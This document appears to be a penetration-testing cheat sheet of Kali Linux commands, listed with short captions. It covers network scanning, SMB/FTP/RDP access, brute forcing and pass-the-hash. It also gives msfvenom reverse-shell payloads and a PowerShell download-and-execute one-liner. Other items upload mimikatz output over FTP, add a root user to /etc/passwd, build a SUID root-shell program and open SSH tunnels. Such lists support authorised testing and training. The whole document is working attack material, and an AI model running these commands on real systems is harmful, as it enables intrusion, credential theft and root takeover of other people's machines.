The tools used here are available in Kali Linux.
TCP network scan, top 100 ports
nmap -nv -sT --top-ports=100 -oA nmap-tcp-top100 192.168.0.0/24
TCP network scan, top 100 ports with OS discovery
nmap -nv -sTV -O --top-ports=100 -oA nmap-tcp-top100 192.168.0.0/24
TCP host scan, all ports with OS discovery
nmap -Pn -sT -O -p- -oA nmap-tcp-all 192.168.0.20
NBT name scan
nbtscan 192.168.0.20
nbtscan 192.168.0.0/24
SNMP scan
nmap –sU –p161,162 10.11.1.0/24 -oA nmap-snmp-scan
onesixtyone 192.168.0.20
onesixtyone -i snmp-hosts.txt -c /usr/share/doc/onesixtyone/dict.txt
snmpenum 192.168.0.20 public windows.txt
Check anonymous access
nmap -p21 --script=ftp-anon 192.168.0.20
Start a local FTP server on port 21 with anonymous access to files in the current directory
sudo apt install python3-pyftpdlib
sudo python3 -m pyftpdlib -w -p 21
FTP script for the Windows command line to download further tools
echo open 192.168.0.20 > ftpscript.txt
echo USER anonymous >> ftpscript.txt
echo anonymous >> ftpscript.txt
echo binary >> ftpscript.txt
echo get PsExec.exe >> ftpscript.txt
echo bye >> ftpscript.txt
ftp -v -n -s:ftpscript.txt
FTP script to upload data to your host
echo open 192.168.0.20 > ftpscript.txt
echo USER anonymous >> ftpscript.txt
echo anonymous >> ftpscript.txt
echo put mimikatz.log >> ftpscript.txt
echo bye >> ftpscript.txt
ftp -v -n -s:ftpscript.txt
Nikto scan
nikto -host 192.168.0.20
nikto -ssl -host 192.168.0.20:443
Directories scan
dirb http://192.168.0.20/ /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://192.168.0.20/ -w /usr/share/wordlists/dirb/big.txt
Start a HTTP server on port 80, serving files from the current directory
sudo python -m SimpleHTTPServer 80
Scan for some known vulnerabilities
nmap -p139,445 --script smb-vuln-* 192.168.0.20
List available shares without providing any user credentials
smbclient -L //192.168.0.20 -N
List shares which are available for user Peter
smbclient -L //192.168.0.20 -U 'Peter'
Connect to share wwwroot
smbclient //192.168.0.20/wwwroot -N
smbclient //192.168.0.20/wwwroot -U 'Peter'
Database info
nmap -nv -Pn -p27900 --script=ms-sql-info --script-args mssql.username=user,mssql.password=password,mssql.instance-name=mydb 192.168.0.20
Connect to the DB
sqsh -S 192.168.0.20 -U username -P password
mssqlclient.py user:password@192.168.0.20 -db mydb -port 27900
Connect to a host using xfreerdp
xfreerdp /u:mydomain\\peter /p:password /v:192.168.0.20
Share a local folder with the remote host
rdesktop -u peter -p password -r disk:shared=/home/kali/shared 192.168.0.20
Pass the hash using xfreerdp
xfreerdp /u:domain\\user /pth:HASH /v:192.168.0.20
Bruteforce RDP credentials
crowbar -b rdp -s 192.168.0.20/32 -U usernames_file -C passwords_file
Check for RealVNC 4.1.0 - 4.1.1 Authentication Bypass
# nmap -p5800,5900 --script realvnc-auth-bypass 192.168.0.20
Creating WAR file exploit with reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f war > revshell.war
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f war > revshell.war
Creating ASP file exploit with reverse shell
msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f asp > reverse.asp
Generating JavaScript code to open a reverse shell
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f js_le
Scan for known vulnerabilities
wpscan --url http://192.168.0.20/wp/
Crack retrieved password hashes
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
Basic information about Windows
systeminfo
List network adapters and IP addresses
ipconfig /all
List open ports and active service connections
netstat -ano
User information, groups, privileges
whoami
whoami /groups
whoami /priv
net user
net user /domain
net user peter
net localgroup
Show ACL information for a folder
icacls "C:\Program Files"
List services, their paths, start mode and privileges
wmic service get name,displayname,pathname,startmode,startname
wmic service get name,displayname,pathname,startmode,startname | findstr /i "auto" | findstr /i /v "C:\Windows"
List installed software, vendors and version numbers
wmic product get name,version,vendor
List drivers installed on the system
driverquery /v
Add a new user
net user peter password /add
Add user to a group
net localgroup Administrators /add peter
net localgroup "Remote Desktop Users" /add peter
From Administrator shell to nt authority\system
PsExec.exe -i -s cmd.exe
Download PowerShell script and execute it without having to store the script on the host
powershell -c "iex (New-Object Net.WebClient).DownloadString('http://192.168.0.1/Invoke-Kerberoast.ps1'); Invoke-Kerberoast"
Upgrading a dumb reverse shell to an interactive TTY
python -c 'import pty; pty.spawn("/bin/bash")'
If /etc/passwd is writable, add a new user with root privileges
openssl passwd -1 password
$1$7RaNk8Qt$vIvEmA/ylE5Rg7t1sDvrG0
openssl passwd -6 -salt peter password
$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.
echo 'peter:$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.:0:0:peter:/root:/bin/bash' >> /etc/passwd
Sample C program to add a new user. Useful if it is possible to run a program from the root context.
#include <stdio.h>
FILE *pfile;
int main(void) {
pfile = fopen("/etc/passwd", "a");
fprintf(pfile, "%s", "peter:$6$peter$cJk9H5n3n4dmdYqyEvDqTCgvR8AGc.qHoewCOuSWo1ufYi67/qmQtE6bM165j6QQv7qFBiB9pFoTWSgyVTU6Z.:0:0:peter:/root:/bin/bash\n");
return 0;
}
Sample SUID program to execute a root shell
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void) {
setuid(0);
setgid(0);
system("/bin/bash");
}
Set the SUID bit and ownership for an executable
chown root:root /tmp/program
chmod u+s /tmp/program
Remote port forwarding in Linux with SSH
ssh -oStrictHostKeyChecking=no -f -N -p 22 -R 9090:127.0.0.1:8080 kali@192.168.0.10 -i id_rsa
Remote port forwarding in Windows with plink.exe
plink.exe -v -ssh -P 22 -R 9090:127.0.0.1:8080 kali@192.168.0.10 -pw kali
Dynamic port forwarding in Linux with SSH
ssh -D 1080 kali@192.168.0.10
A simple wget alternative in python to download files when wget is not available
import urllib2
import sys
response = urllib2.urlopen(sys.argv[1])
data = response.read()
filename = sys.argv[1].split("/")[-1]
target_file = open(filename, "w")
target_file.write(data)
target_file.close()